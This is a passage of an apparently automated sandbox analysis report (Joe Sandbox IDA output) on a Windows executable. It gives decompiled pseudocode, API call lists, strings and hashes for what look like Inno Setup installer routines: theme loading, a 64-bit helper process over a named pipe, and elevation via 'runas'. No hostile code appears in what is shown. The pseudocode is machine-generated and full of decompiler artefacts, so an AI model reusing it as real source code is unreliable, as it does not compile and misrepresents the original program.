							 *0x49a734 = GetProcAddress( *0x49a75c, "IsAppThemed");
							 *0x49a738 = GetProcAddress( *0x49a75c, "GetWindowTheme");
							 *0x49a73c = GetProcAddress( *0x49a75c, "EnableThemeDialogTexture");
							 *0x49a740 = GetProcAddress( *0x49a75c, "IsThemeDialogTextureEnabled");
							 *0x49a744 = GetProcAddress( *0x49a75c, "GetThemeAppProperties");
							 *0x49a748 = GetProcAddress( *0x49a75c, "SetThemeAppProperties");
							 *0x49a74c = GetProcAddress( *0x49a75c, "GetCurrentThemeName");
							 *0x49a750 = GetProcAddress( *0x49a75c, "GetThemeDocumentationProperty");
							 *0x49a754 = GetProcAddress( *0x49a75c, "DrawThemeParentBackground");
							_t3 = GetProcAddress( *0x49a75c, "EnableTheming");
							 *0x49a758 = _t3;
						}
					}
				}
				return _t3 & 0xffffff00 |  *0x49a75c != 0x00000000;
			}

0x0044ac96
0x0044ac9f
0x0044aca5
0x0044acac
0x0044acb7
0x0044acbc
0x0044acc1
0x0044acd4
0x0044ace6
0x0044acf8
0x0044ad0a
0x0044ad1c
0x0044ad2e
0x0044ad40
0x0044ad52
0x0044ad64
0x0044ad76
0x0044ad88
0x0044ad9a
0x0044adac
0x0044adbe
0x0044add0
0x0044ade2
0x0044adf4
0x0044ae06
0x0044ae18
0x0044ae2a
0x0044ae3c
0x0044ae4e
0x0044ae60
0x0044ae72
0x0044ae84
0x0044ae96
0x0044aea8
0x0044aeba
0x0044aecc
0x0044aede
0x0044aef0
0x0044af02
0x0044af14
0x0044af26
0x0044af38
0x0044af4a
0x0044af5c
0x0044af6e
0x0044af80
0x0044af92
0x0044afa4
0x0044afb6
0x0044afc8
0x0044afda
0x0044afec
0x0044affe
0x0044b00b
0x0044b010
0x0044b010
0x0044acc1
0x0044acac
0x0044b01c

APIs

Part of subcall function 0044AC3C: GetVersionExA.KERNEL32(00000094), ref: 0044AC59

LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EDAD,00496EEE), ref: 0044ACB7
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044ACCF
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044ACE1
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044ACF3
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AD05
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AD17
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AD29
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AD3B
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AD4D
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AD5F
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AD71
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AD83
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AD95
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044ADA7
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044ADB9
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044ADCB
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044ADDD
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044ADEF
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044AE01
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044AE13
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044AE25
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044AE37
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044AE49
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044AE5B
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044AE6D
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044AE7F
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044AE91
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044AEA3
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044AEB5
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044AEC7
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044AED9
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044AEEB
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044AEFD
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044AF0F
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044AF21
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044AF33
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044AF45
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044AF57
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044AF69
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044AF7B
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044AF8D
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044AF9F
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044AFB1
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044AFC3
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044AFD5
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044AFE7
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044AFF9
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B00B

Strings

GetThemeBool, xrefs: 0044AE0B
GetThemeBackgroundContentRect, xrefs: 0044AD0F, 0044AD21
uxtheme.dll, xrefs: 0044ACB2
IsThemeActive, xrefs: 0044AF4F
GetThemeBackgroundRegion, xrefs: 0044AD69
GetWindowTheme, xrefs: 0044AF73
CloseThemeData, xrefs: 0044ACD9
GetThemeFont, xrefs: 0044AE53
IsAppThemed, xrefs: 0044AF61
GetThemeAppProperties, xrefs: 0044AFA9
GetThemeMargins, xrefs: 0044AE77
GetThemeSysColor, xrefs: 0044AED1
IsThemeDialogTextureEnabled, xrefs: 0044AF97
SetThemeAppProperties, xrefs: 0044AFBB
GetThemeString, xrefs: 0044ADF9
GetThemeSysColorBrush, xrefs: 0044AEE3
GetThemeSysInt, xrefs: 0044AF3D
EnableTheming, xrefs: 0044B003
DrawThemeText, xrefs: 0044ACFD
GetThemeMetric, xrefs: 0044ADE7
GetThemeFilename, xrefs: 0044AEBF
GetThemeSysFont, xrefs: 0044AF19
GetThemeColor, xrefs: 0044ADD5
GetThemeRect, xrefs: 0044AE65
GetThemeTextMetrics, xrefs: 0044AD57
GetThemePartSize, xrefs: 0044AD33
GetThemeSysSize, xrefs: 0044AF07
GetThemeDocumentationProperty, xrefs: 0044AFDF
IsThemeBackgroundPartiallyTransparent, xrefs: 0044ADC3
GetThemeIntList, xrefs: 0044AE89
HitTestThemeBackground, xrefs: 0044AD7B
DrawThemeParentBackground, xrefs: 0044AFF1
DrawThemeEdge, xrefs: 0044AD8D
IsThemePartDefined, xrefs: 0044ADB1
GetThemeSysBool, xrefs: 0044AEF5
SetWindowTheme, xrefs: 0044AEAD
GetThemeInt, xrefs: 0044AE1D
DrawThemeIcon, xrefs: 0044AD9F
GetThemeEnumValue, xrefs: 0044AE2F
GetThemeTextExtent, xrefs: 0044AD45
GetThemePropertyOrigin, xrefs: 0044AE9B
EnableThemeDialogTexture, xrefs: 0044AF85
DrawThemeBackground, xrefs: 0044ACEB
GetThemeSysString, xrefs: 0044AF2B
OpenThemeData, xrefs: 0044ACC7
GetCurrentThemeName, xrefs: 0044AFCD
GetThemePosition, xrefs: 0044AE41

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoadVersion
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 1968650500-2910565190
Opcode ID: 111ed31fbbed814d086d94ce9738d7a3fbd2a93d83e05be07ff6902d19647fb1
Instruction ID: e873c06371e544aec880cc9e7e253fc2a2b57b134205f7af049f3e6e3373eac0
Opcode Fuzzy Hash: 111ed31fbbed814d086d94ce9738d7a3fbd2a93d83e05be07ff6902d19647fb1
Instruction Fuzzy Hash: 0F91D7B0A40B50EBEF00EFF598C6A2636A8EB15B1471445BBB444EF295D778C8148F9E

Uniqueness

Uniqueness Score: -1.00%

Function 00457964 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186
pipeprocessfileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00457964(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v12;
				char _v16;
				void* _v20;
				void* _v24;
				long _v28;
				struct _STARTUPINFOA _v96;
				struct _PROCESS_INFORMATION _v112;
				char _v116;
				long _v120;
				char _v124;
				long _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				void* _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				int _t82;
				CHAR* _t90;
				CHAR* _t96;
				intOrPtr _t97;
				int _t99;
				void* _t126;
				intOrPtr _t139;
				struct _FILETIME* _t141;
				void* _t145;
				void* _t146;
				intOrPtr _t147;

				_t145 = _t146;
				_t147 = _t146 + 0xffffff4c;
				_v156 = 0;
				_v160 = 0;
				_v16 = 0;
				_t126 = __eax;
				_t141 =  &_v12;
				_push(_t145);
				_push(0x457c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				E00456B58("Starting 64-bit helper process.", __eax, __ecx, _t141, 0x49afdc);
				_t149 =  *0x49b370;
				if( *0x49b370 == 0) {
					E004526A4("Cannot utilize 64-bit features on this version of Windows", _t126, _t141, 0x49afdc, _t149);
				}
				_t150 =  *0x49afd8;
				if( *0x49afd8 == 0) {
					E004526A4("64-bit helper EXE wasn\'t extracted", _t126, _t141, 0x49afdc, _t150);
				}
				while(1) {
					 *0x49afdc =  *0x49afdc + 1;
					 *((intOrPtr*)(_t126 + 0x14)) = GetTickCount();
					if(QueryPerformanceCounter(_t141) == 0) {
						GetSystemTimeAsFileTime(_t141);
					}
					_v152 = GetCurrentProcessId();
					_v148 = 0;
					_v144 =  *0x49afdc;
					_v140 = 0;
					_v136 =  *((intOrPtr*)(_t126 + 0x14));
					_v132 = 0;
					_v128 = _t141->dwHighDateTime;
					_v124 = 0;
					_v120 = _t141->dwLowDateTime;
					_v116 = 0;
					E004078D4("\\\\.\\pipe\\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x", 4,  &_v152,  &_v16);
					_v20 = CreateNamedPipeA(E00403738(_v16), 0x40080003, 6, 1, 0x2000, 0x2000, 0, 0);
					if(_v20 != 0xffffffff) {
						break;
					}
					if(GetLastError() != 0xe7) {
						E004527FC("CreateNamedPipe");
					}
				}
				_push(_t145);
				_push(0x457c1a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v24 = CreateFileA(E00403738(_v16), 0xc0000000, 0,  &E00498AF0, 3, 0, 0);
				__eflags = _v24 - 0xffffffff;
				if(_v24 == 0xffffffff) {
					E004527FC("CreateFile");
				}
				_push(_t145);
				_push(0x457c09);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v28 = 2;
				_t82 = SetNamedPipeHandleState(_v24,  &_v28, 0, 0);
				__eflags = _t82;
				if(_t82 == 0) {
					E004527FC("SetNamedPipeHandleState");
				}
				E00402934( &_v96, 0x44);
				_v96.cb = 0x44;
				E0042D868( &_v156);
				_t90 = E00403738(_v156);
				_v176 = 0x69;
				_v172 = 0;
				_v168 = _v24;
				_v164 = 0;
				E004078D4("helper %d 0x%x", 1,  &_v176,  &_v160);
				_t96 = E00403738(_v160);
				_t97 =  *0x49afd8; // 0x2290184
				_t99 = CreateProcessA(E00403738(_t97), _t96, 0, 0, 1, 0xc000000, 0, _t90,  &_v96,  &_v112);
				__eflags = _t99;
				if(_t99 == 0) {
					E004527FC("CreateProcess");
				}
				 *((char*)(_t126 + 4)) = 1;
				 *((char*)(_t126 + 5)) = 0;
				 *(_t126 + 8) = _v112.hProcess;
				 *((intOrPtr*)(_t126 + 0x10)) = _v112.dwProcessId;
				 *((intOrPtr*)(_t126 + 0xc)) = _v20;
				_v20 = 0;
				CloseHandle(_v112.hThread);
				_v184 =  *((intOrPtr*)(_t126 + 0x10));
				_v180 = 0;
				E00456D64("Helper process PID: %u", _t126, 0,  &_v184, _t141, 0x49afdc);
				__eflags = 0;
				_pop(_t139);
				 *[fs:eax] = _t139;
				_push(E00457C10);
				return CloseHandle(_v24);
			}

0x00457965
0x00457967
0x00457972
0x00457978
0x0045797e
0x00457981
0x00457988
0x0045798d
0x0045798e
0x00457993
0x00457996
0x0045799e
0x004579a3
0x004579aa
0x004579b1
0x004579b1
0x004579b6
0x004579bd
0x004579c4
0x004579c4
0x004579c9
0x004579c9
0x004579d0
0x004579db
0x004579de
0x004579de
0x004579ec
0x004579f2
0x004579fb
0x00457a01
0x00457a0b
0x00457a11
0x00457a18
0x00457a1b
0x00457a21
0x00457a24
0x00457a38
0x00457a62
0x00457a69
0x00000000
0x00000000
0x00457a75
0x00457a80
0x00457a80
0x00457a75
0x00457a8c
0x00457a8d
0x00457a92
0x00457a95
0x00457ab8
0x00457abb
0x00457abf
0x00457ac6
0x00457ac6
0x00457acd
0x00457ace
0x00457ad3
0x00457ad6
0x00457ad9
0x00457aec
0x00457af1
0x00457af3
0x00457afa
0x00457afa
0x00457b09
0x00457b0e
0x00457b23
0x00457b2e
0x00457b48
0x00457b52
0x00457b5c
0x00457b62
0x00457b79
0x00457b84
0x00457b8a
0x00457b95
0x00457b9a
0x00457b9c
0x00457ba3
0x00457ba3
0x00457ba8
0x00457bac
0x00457bb3
0x00457bb9
0x00457bbf
0x00457bc4
0x00457bcb
0x00457bd3
0x00457bd9
0x00457bed
0x00457bf2
0x00457bf4
0x00457bf7
0x00457bfa
0x00457c08

APIs

GetTickCount.KERNEL32 ref: 004579CB
QueryPerformanceCounter.KERNEL32(0226386C,00000000,00457C5E,?,?,0226386C,00000000,?,0045835A,?,0226386C,00000000), ref: 004579D4
GetSystemTimeAsFileTime.KERNEL32(0226386C,0226386C), ref: 004579DE
GetCurrentProcessId.KERNEL32(?,0226386C,00000000,00457C5E,?,?,0226386C,00000000,?,0045835A,?,0226386C,00000000), ref: 004579E7
CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457A5D
GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,0226386C,0226386C), ref: 00457A6B
CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457C1A), ref: 00457AB3
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457C09,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457C1A), ref: 00457AEC

Part of subcall function 0042D868: GetSystemDirectoryA.KERNEL32 ref: 0042D87B

CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457B95
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457BCB
CloseHandle.KERNEL32(000000FF,00457C10,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457C03

Part of subcall function 004527FC: GetLastError.KERNEL32(00000000,0045326D,00000005,00000000,004532A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,004966A1,00000000), ref: 004527FF

Strings

i, xrefs: 00457B48
helper %d 0x%x, xrefs: 00457B74
Cannot utilize 64-bit features on this version of Windows, xrefs: 004579AC
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00457A33
CreateNamedPipe, xrefs: 00457A7B
CreateFile, xrefs: 00457AC1
64-bit helper EXE wasn't extracted, xrefs: 004579BF
D, xrefs: 00457B0E
SetNamedPipeHandleState, xrefs: 00457AF5
CreateProcess, xrefs: 00457B9E
Starting 64-bit helper process., xrefs: 00457999
Helper process PID: %u, xrefs: 00457BE8

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
API String ID: 770386003-3271284199
Opcode ID: 3057b9778142a9d47e5776bd957cbb58752ce65e509059b258d6a9aca3cfe1b9
Instruction ID: cbc5723897a0f2a07f719688631d968a8430a29c6042ca87ccf4042f92a9acd7
Opcode Fuzzy Hash: 3057b9778142a9d47e5776bd957cbb58752ce65e509059b258d6a9aca3cfe1b9
Instruction Fuzzy Hash: F8713570A043449EDB11DB69DC45B9E7BF8EF05705F1084BAF908EB282D77859488F69

Uniqueness

Uniqueness Score: -1.00%

Function 00476C24 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00476C24(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				DWORD* _v8;
				char _v12;
				char _v16;
				void* _v20;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v72;
				char _v76;
				char* _t37;
				long _t40;
				intOrPtr _t69;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t70 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xffffffb8;
				_push(__edi);
				_v12 = 0;
				_v16 = 0;
				_v8 = __ecx;
				_t72 = __edx;
				_t60 = __eax;
				_push(_t74);
				_push(0x476d72);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				E00476A90(__eax, __ecx,  &_v12);
				E00476B68( &_v16, _t60, __edi, _t72);
				E00402934( &_v76, 0x3c);
				_v76 = 0x3c;
				_v72 = 0x800540;
				_v64 = 0x476d80;
				_v60 = E00403738(_v12);
				_v56 = E00403738(_t72);
				_v52 = E00403738(_v16);
				_v48 = 1;
				_t37 =  &_v76;
				_push(_t37);
				L0042CC48();
				if(_t37 == 0) {
					if(GetLastError() == 0x4c7) {
						E00408BC0();
					}
					E004527FC("ShellExecuteEx");
				}
				_t80 = _v20;
				if(_v20 == 0) {
					E004526A4("ShellExecuteEx returned hProcess=0", _t60, _t70, _t72, _t80);
				}
				_push(_t74);
				_push(0x476d50);
				_push( *[fs:edx]);
				 *[fs:edx] = _t76;
				do {
					E004767B0();
					_t40 = MsgWaitForMultipleObjects(1,  &_v20, 0, 0xffffffff, 0xff);
				} while (_t40 == 1);
				if(_t40 + 1 == 0) {
					E004527FC("MsgWaitForMultipleObjects");
				}
				E004767B0();
				if(GetExitCodeProcess(_v20, _v8) == 0) {
					E004527FC("GetExitCodeProcess");
				}
				_pop(_t69);
				 *[fs:eax] = _t69;
				_push(E00476D57);
				return CloseHandle(_v20);
			}

0x00476c24
0x00476c25
0x00476c27
0x00476c2c
0x00476c2f
0x00476c32
0x00476c35
0x00476c38
0x00476c3a
0x00476c3e
0x00476c3f
0x00476c44
0x00476c47
0x00476c4f
0x00476c57
0x00476c66
0x00476c6b
0x00476c72
0x00476c7e
0x00476c89
0x00476c93
0x00476c9e
0x00476ca1
0x00476ca8
0x00476cab
0x00476cac
0x00476cb3
0x00476cbf
0x00476cc1
0x00476cc1
0x00476ccb
0x00476ccb
0x00476cd0
0x00476cd4
0x00476cdb
0x00476cdb
0x00476ce2
0x00476ce3
0x00476ce8
0x00476ceb
0x00476cee
0x00476cee
0x00476d02
0x00476d07
0x00476d0d
0x00476d14
0x00476d14
0x00476d19
0x00476d2d
0x00476d34
0x00476d34
0x00476d3b
0x00476d3e
0x00476d41
0x00476d4f

APIs

Part of subcall function 00476A90: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02262A38,?,?,?,02262A38,00476C54,00000000,00476D72,?,?,-00000010,?), ref: 00476AA9
Part of subcall function 00476A90: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476AAF
Part of subcall function 00476A90: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02262A38,?,?,?,02262A38,00476C54,00000000,00476D72,?,?,-00000010,?), ref: 00476AC2
Part of subcall function 00476A90: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02262A38,?,?,?,02262A38), ref: 00476AEC
Part of subcall function 00476A90: CloseHandle.KERNEL32(00000000,?,?,?,02262A38,00476C54,00000000,00476D72,?,?,-00000010,?), ref: 00476B0A

Part of subcall function 00476B68: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476BFA,?,?,?,02262A38,?,00476C5C,00000000,00476D72,?,?,-00000010,?), ref: 00476B98

ShellExecuteEx.SHELL32(0000003C), ref: 00476CAC
GetLastError.KERNEL32(00000000,00476D72,?,?,-00000010,?), ref: 00476CB5
MsgWaitForMultipleObjects.USER32 ref: 00476D02
GetExitCodeProcess.KERNEL32 ref: 00476D26
CloseHandle.KERNEL32(00000000,00476D57,00000000,00000000,000000FF,000000FF,00000000,00476D50,?,00000000,00476D72,?,?,-00000010,?), ref: 00476D4A

Strings

runas, xrefs: 00476C79
GetExitCodeProcess, xrefs: 00476D2F
<, xrefs: 00476C6B
ShellExecuteEx returned hProcess=0, xrefs: 00476CD6
ShellExecuteEx, xrefs: 00476CC6
MsgWaitForMultipleObjects, xrefs: 00476D0F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 883996979-221126205
Opcode ID: 2b574eda821b69c0285d99beace6bd1ffa90e8a3a1b156e4ae3bb15aa3f5b924
Instruction ID: e9ac78ae47e2a1bfc0de8969dd6c35abcfabf79e25726a482db63fcde1fa084f
Opcode Fuzzy Hash: 2b574eda821b69c0285d99beace6bd1ffa90e8a3a1b156e4ae3bb15aa3f5b924
Instruction Fuzzy Hash: 34315670A10A04AFDB20EFAAC841ADEB6BAEF09314F51843FF518F7281D77C59058B59

Uniqueness

Uniqueness Score: -1.00%

Function 00422844 Relevance: 18.3, APIs: 12, Instructions: 255
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00422844(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				void* __ecx;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t105;
				struct HWND__* _t106;
				long _t116;
				long _t150;
				intOrPtr _t156;
				int _t161;
				intOrPtr _t162;
				intOrPtr _t182;
				intOrPtr _t186;
				struct HWND__* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				void* _t207;
				intOrPtr _t211;
				intOrPtr _t212;
				intOrPtr _t214;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				intOrPtr _t227;
				intOrPtr _t228;

				_t227 = _t228;
				_push(0xf031);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x119) & 0x00000004) != 0) {
					E00408C9C(__ebx, 0xf031, 1, __edi, __esi);
					E0040311C();
				}
				 *(_v8 + 0x119) =  *(_v8 + 0x119) | 0x00000004;
				_push(_t227);
				_push(0x422ba6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t228;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t95 = _v8;
					_t232 =  *((char*)(_t95 + 0xc7));
					if( *((char*)(_t95 + 0xc7)) == 0) {
						 *[fs:eax] = _t228;
						E00402C00(_v8, 0xffdd, 0xf031, __eflags,  *[fs:eax], 0x422aad, _t227);
						_pop(_t212);
						_pop(_t207);
						 *[fs:eax] = _t212;
						_t100 =  *0x49a62c; // 0x2260660
						__eflags =  *((intOrPtr*)(_t100 + 0x40)) - _v8;
						if( *((intOrPtr*)(_t100 + 0x40)) == _v8) {
							__eflags = 0;
							E00421E14(_v8, _t207, 0);
						}
						_t102 = _v8;
						__eflags =  *((char*)(_t102 + 0x116)) - 1;
						if( *((char*)(_t102 + 0x116)) != 1) {
							_t103 = _v8;
							__eflags =  *(_t103 + 0x119) & 0x00000008;
							if(( *(_t103 + 0x119) & 0x00000008) == 0) {
								_t195 = 0;
								_t105 = E004181C8(_v8);
								_t106 = GetActiveWindow();
								__eflags = _t105 - _t106;
								if(_t105 == _t106) {
									_t116 = IsIconic(E004181C8(_v8));
									__eflags = _t116;
									if(_t116 == 0) {
										_t195 = E0041EFDC(E004181C8(_v8));
									}
								}
								__eflags = _t195;
								if(_t195 == 0) {
									ShowWindow(E004181C8(_v8), 0);
								} else {
									SetWindowPos(E004181C8(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t195);
								}
							} else {
								SetWindowPos(E004181C8(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E00416698(_v8);
						}
					} else {
						 *[fs:eax] = _t228;
						E00402C00(_v8, 0xffdc, 0xf031, _t232,  *[fs:eax], 0x4228d2, _t227);
						_pop(_t214);
						 *[fs:eax] = _t214;
						if( *((char*)(_v8 + 0x117)) == 4) {
							if( *((char*)(_v8 + 0x116)) != 1) {
								_t198 = E00423190() -  *(_v8 + 0x2c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc ebx, 0x0");
								}
								_t222 = E00423188() -  *(_v8 + 0x30);
								__eflags = _t222;
								_t223 = _t222 >> 1;
								if(_t222 < 0) {
									asm("adc esi, 0x0");
								}
							} else {
								_t182 =  *0x49a628; // 0x2262410
								_t202 = E004146A4( *((intOrPtr*)(_t182 + 0x28))) -  *(_v8 + 0x2c);
								_t199 = _t202 >> 1;
								if(_t202 < 0) {
									asm("adc ebx, 0x0");
								}
